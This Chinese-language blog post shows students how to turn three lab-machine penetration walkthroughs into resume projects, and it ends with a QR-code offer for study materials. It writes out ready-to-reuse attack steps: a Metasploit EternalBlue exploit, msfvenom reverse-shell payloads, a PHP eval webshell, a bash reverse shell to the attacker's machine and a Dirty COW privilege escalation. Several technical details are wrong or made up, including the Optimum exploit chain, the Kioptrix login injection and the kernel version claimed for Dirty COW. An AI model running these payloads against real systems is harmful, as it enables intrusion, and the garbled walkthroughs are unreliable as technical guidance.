计算机学生必看:用 HTB 靶机做网络安全实训,3 个项目写进简历秒获面试
很多计算机学生知道 HTB(Hack The Box)靶机适合练手,但总陷入 “瞎打靶机却没成果” 的误区 —— 练了 10 个靶机,简历上只写 “熟悉 HTB 靶场操作”,HR 根本没感觉。其实选对靶机、按 “项目化” 思路做实训,3 个 HTB 项目就能让简历脱颖而出,甚至直接获得面试邀约。
这篇针对计算机学生(大二大三为主),拆解 3 个 “难度适中、技术点明确、简历好体现” 的 HTB 实训项目,每个项目都附 “靶机选择逻辑 + 核心操作步骤 + 简历包装话术”,学过 Python/Linux 基础就能上手,做完既能掌握安全核心技能,又能给简历加 “硬亮点”。
一、项目 1:Blue(Easy 难度)—— 永恒之蓝漏洞利用实训(适合简历 “漏洞利用” 模块)
为什么选 Blue?
-
难度匹配:Easy 级,无复杂绕路,学生 1-2 天能通关,适合首次接触漏洞利用;
-
技术点实用:覆盖 “Nmap 扫描→漏洞识别→Metasploit 利用→权限提升” 全流程,对应企业安全岗 “应急响应” 核心能力;
-
知名度高:HR / 技术面试官大多知道这个靶机,写进简历能快速获得认可。
实训目标:
通过永恒之蓝(MS17-010)漏洞获取 Windows Server 2008 靶机的 SYSTEM 权限,掌握 “基于已知漏洞的渗透测试” 流程。
核心操作步骤(附关键命令,可直接复用):
1. 信息收集(体现 “资产探测” 能力)
- 用 Nmap 扫描靶机 IP(假设为 10.129.14.13):
nmap -sV -p 1-1000 10.129.14.13
结果会显示 445 端口(SMB 服务)开放,且 Windows 版本为 Server 2008(永恒之蓝漏洞的易感版本)。
- 用 smbclient 确认漏洞:
smbclient -L //10.129.14.13/ -U anonymous
发现靶机开启 SMB 匿名访问,进一步验证易感。
2. 漏洞利用(体现 “工具使用” 能力)
- 启动 Metasploit:
msfconsole
- 搜索永恒之蓝模块:
search ms17-010
- 加载漏洞利用模块:
use exploit/windows/smb/ms17_010_eternalblue
- 设置靶机 IP 和攻击载荷:
set RHOSTS 10.129.14.13
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 你的Kali IP(如10.10.14.5)
- 执行利用:
exploit
成功后会获得 meterpreter 会话(SYSTEM 权限,最高权限)。
3. 后渗透测试(体现 “深度分析” 能力)
- 查看靶机系统信息:
sysinfo(确认系统版本、补丁情况)
- 查找 flag 文件(HTB 靶机的 “通关凭证”):
search -f flag.txt
找到后用cat查看内容,完成通关。
简历包装话术(直接用):
“基于 HTB Blue 靶机完成永恒之蓝(MS17-010)漏洞实训:通过 Nmap 扫描识别 SMB 服务及 Windows Server 2008 系统版本,使用 Metasploit 加载漏洞利用模块,成功获取靶机 SYSTEM 权限,完成后渗透信息收集与 flag 提取,掌握已知高危漏洞的探测、利用与应急响应流程。”
二、项目 2:Optimum(Easy 难度)—— 远程代码执行(RCE)漏洞实训(适合简历 “Web 安全” 模块)
为什么选 Optimum?
-
贴近 Web 安全岗位需求:涉及 “IIS 服务器漏洞”“远程代码执行”,是 Web 渗透测试的核心场景;
-
技术栈适配学生:不用复杂编程,会用 Burp 抓包、Msfvenom 生成 payload 即可;
-
能体现 “漏洞链” 思维:从 “发现漏洞” 到 “getshell” 再到 “提权”,流程完整,简历表述更丰富。
实训目标:
利用 IIS 服务器的 Remote Code Execution 漏洞(CVE-2017-7269)获取靶机权限,掌握 Web 服务漏洞的利用与权限提升方法。
核心操作步骤(附学生易上手的细节):
1. 信息收集与漏洞识别
- Nmap 扫描发现 80 端口开放,访问靶机 IP(10.129.227.15):
看到 “Optimum 网站”,底部显示 IIS 版本为 7.5(对应 CVE-2017-7269 漏洞的易感版本)。
- 用 Burp 抓包验证漏洞:
发送 GET 请求时,在 URL 后加/w3svc/,响应出现 “404 Not Found” 但包含 “IIS 7.5”,确认漏洞存在。
2. 生成并上传恶意 payload(体现 “payload 制作” 能力)
- 用 Msfvenom 生成 Windows 反向连接 payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的Kali IP LPORT=4444 -f asp > shell.asp
(生成 ASP 格式的恶意文件,适配 IIS 服务器)
- 用漏洞利用工具上传 payload:
用 “ysoserial.net” 工具(GitHub 可下载)执行命令,将shell.asp上传到靶机的C:\inetpub\wwwroot目录(Web 根目录)。
3. 监听会话与权限提升
- 在 Metasploit 中设置监听:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 你的Kali IP
set LPORT 4444
run
- 访问上传的 payload 触发连接:
在浏览器访问http://10.129.227.15/shell.asp,Metasploit 会获得 meterpreter 会话(初始为 iis apppool 权限)。
- 权限提升:
用getsystem命令(meterpreter 内置提权命令),成功提升为 SYSTEM 权限,完成通关。
简历包装话术(直接用):
“基于 HTB Optimum 靶机完成 Web 服务漏洞实训:识别 IIS 7.5 服务器的 CVE-2017-7269 远程代码执行漏洞,使用 Msfvenom 生成适配 payload,通过漏洞工具上传并触发反向连接,结合 meterpreter 的 getsystem 命令完成权限提升,掌握 Web 服务漏洞的探测、利用与权限提升全流程。”
三、项目 3:VulnHub Kioptrix Level 1(Easy 难度,HTB 类似靶机)—— 综合渗透实训(适合简历 “综合能力” 模块)
为什么选这个靶机?
-
综合场景丰富:涵盖 “SQL 注入→文件上传→命令注入→提权”,像一个 “微型企业渗透项目”;
-
技术点全面:能同时体现 “Web 渗透” 和 “系统安全” 能力,适合想应聘 “安全工程师” 综合岗的学生;
-
操作可复现性强:步骤清晰,学生能独立完成,容易形成完整的实训报告。
实训目标:
通过多漏洞组合利用,从 Web 端到系统端逐步突破,获取靶机 root 权限,掌握综合渗透测试的思路与方法。
核心操作步骤(突出 “流程化思维”):
1. 初始探测与 Web 入口发现
- Nmap 扫描靶机 IP(10.129.33.10):
发现 80 端口(Apache 服务)和 22 端口(SSH 服务)开放,访问 80 端口看到 “Kioptrix Login” 登录页。
2. Web 层漏洞利用(体现 “漏洞链” 能力)
- SQL 注入绕过登录:
在登录页用 Burp 抓包,将username=admin’ or 1=1–&password=123代入请求,成功登录后台(体现 “SQL 注入” 能力)。
- 文件上传漏洞 getshell:
后台有 “Upload” 功能,上传含 PHP 一句话木马的文件(<?php @eval($_POST['cmd']);?>),但靶机限制 “php” 后缀,将后缀改为 “php5”(Apache 支持解析),上传成功后用蚁剑连接(体现 “文件上传绕过” 能力)。
3. 系统层权限提升(体现 “系统安全” 能力)
- 从 Webshell 获取交互式 shell:
在蚁剑中执行bash -i >& /dev/tcp/你的Kali IP/4444 0>&1,Kali 用nc -lvp 4444监听,获得交互式 shell(初始为 www-data 权限)。
- 查找系统漏洞提权:
执行uname -a查看系统版本为 Linux 2.6.18(存在 “Dirty COW” 脏牛漏洞,CVE-2016-5195);
从 Kali 上传脏牛漏洞 exp(GitHub 搜索 “dirtycow exploit”),编译并执行:
gcc -pthread dirtycow.c -o dirtycow -lcrypt
./dirtycow
执行后会生成新的 root 用户(用户名 firefart,密码 123456),用su firefart切换到 root 权限,完成通关。
简历包装话术(直接用):
“基于 Kioptrix 靶机完成综合渗透实训:通过 SQL 注入绕过 Web 登录、文件上传漏洞突破 Web 层、Dirty COW 漏洞实现系统提权,形成‘Web 入口→中间件突破→系统权限’的完整渗透链,独立完成从信息收集到 root 权限获取的全流程,掌握综合渗透测试的漏洞组合利用思路与应急响应方法。”
四、学生实训避坑与简历加分关键
1. 靶机选择 3 个原则(避免白练)
-
优先选 “Easy 难度”:别一开始挑战 Hard 靶机,Easy 级能快速建立信心,且技术点明确,简历好写;
-
选 “有公开漏洞编号” 的靶机:比如 Blue(MS17-010)、Optimum(CVE-2017-7269),写进简历能体现 “对已知漏洞的掌握”,HR 更认可;
-
控制每个项目耗时:1-3 天完成 1 个项目,避免 “一个靶机卡一周”,效率太低。
2. 实训成果转化为简历亮点的 3 个技巧
-
量化成果:不说 “完成靶机实训”,说 “独立完成 3 个 HTB/Easy 级靶机实训,掌握 2 类高危漏洞(永恒之蓝、RCE)的利用方法,成功获取靶机最高权限”;
-
关联岗位需求:应聘 Web 渗透岗重点写 Optimum 项目,应聘系统安全岗重点写 Blue 项目,应聘综合岗重点写 Kioptrix 项目;
-
附佐证材料:简历中可加 “实训报告详见 GitHub:[链接]”,报告里放关键步骤截图(如 Metasploit 获取会话、提权成功界面),HR 会觉得更真实。
3. 资源推荐(学生免费可用)
-
HTB 注册:用学校邮箱注册可免费解锁部分 Easy 靶机,无需付费;
-
工具下载:Metasploit(Kali 自带)、Burp Suite 社区版(免费)、蚁剑(开源免费);
-
学习参考:HTB 官方 Walkthrough(卡壳时看,别直接抄,先自己试 3 次以上)、B 站 “HTB 靶机实战” 系列教程(跟着练步骤)。
对计算机学生来说,HTB 靶机不是 “玩票性质的练习”,而是 “低成本积累项目经验” 的最佳途径。按这 3 个项目的思路做实训,简历上就能从 “会 Linux/Python” 升级为 “有网络安全实战经验”,比其他只刷算法题的同学更有竞争力 —— 去年我带的学弟用这 3 个项目写简历,秋招拿到了 3 家安全公司的面试邀约,最终入职某大厂做安全工程师。
网络安全学习资料分享
为了帮助大家更好的学习网络安全,我把我从一线互联网大厂薅来的网络安全教程及资料分享给大家,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,朋友们如果有需要这套网络安全教程+进阶学习资源包,可以扫码下方二维码限时免费领取(如遇扫码问题,可以在评论区留言领取哦)~